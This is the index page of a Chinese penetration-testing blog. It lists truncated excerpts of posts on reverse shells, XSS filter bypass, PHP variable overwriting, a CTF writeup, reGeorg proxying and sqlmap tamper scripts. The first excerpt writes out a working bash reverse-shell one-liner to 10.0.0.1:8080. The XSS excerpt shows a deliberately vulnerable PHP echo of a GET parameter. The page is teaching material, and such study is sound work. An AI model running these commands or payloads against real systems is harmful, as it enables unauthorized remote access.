p0's blog | 破 关注网络安全
反弹shell的几种姿势
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 4106
bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意某些linux不支持perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;s...

阅读全文>>

XSS绕过分析
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 3351
0x00 前言本文介绍简单xss利用及其绕过,几个案例,都是比较简单的,绕过方法分享给大家0x01 分析1、无安全方面的限制,直接使用关键代码:<?php @$id = $_GET['id']; echo $id;payload:<script>...

阅读全文>>

Celery+Redis简单实现分布式爬虫
发表于: | 分类: Python | 评论:0 | 阅读: 5464
Celery官方手册:http://docs.jinkan.org/docs/celery/本文不再讲解Celery+Redis分布式环境搭建,具体参考官方手册第一个程序:tasks.py:from celery import Celery app = Cele...

阅读全文>>

南京邮电大学网络攻防平台web writeup
发表于: | 分类: CTF | 评论:1 | 阅读: 5821
平台地址:http://ctf.nuptsast.com/<h3>签到题:</h3>查看源代码的flag:nctf{flag_admiaanaaaaaaaaaaa}<h3>签到2:</h3>post提交input标签...

阅读全文>>

PHP变量覆盖漏洞总结
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 4904
一、全局变量覆盖当register_global=ON时,变量来源可能是各个不同的地方,比如页面的表单,Cookie等。<?php echo "Register_globals: ".(int)ini_get("regist...

阅读全文>>

Python的md5和sha1加密
发表于: | 分类: Python | 评论:0 | 阅读: 2734
MD5MD5的全称是Message-Digest Algorithm 5(信息-摘要算法)。128位长度。目前MD5是一种不可逆算法。具有很高的安全性。它对应任何字符串都可以加密成一段唯一的固定长度的代码。SHA1SHA1的全称是Secure Hash Algor...

阅读全文>>

内网渗透之socks5代理(reGeorg+proxifier详细配置说明)
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 3606
<h2>正向代理与反向代理</h2><h3>正向代理</h3><p>Lhost-->proxy-->Rhost<br/>Lhost为了访问到Rhost,向proxy发送了一个请求并...

阅读全文>>

SQLMAP tamper WAF 绕过脚本列表
发表于: | 分类: 安全工具 | 评论:0 | 阅读: 4028
使用方法 --tamper xxx.pyapostrophemask.py 用UTF-8全角字符替换单引号字符apostrophenullencode.py 用非法双字节unicode字符替换单引号字符appendnullbyte.p...

阅读全文>>

TOP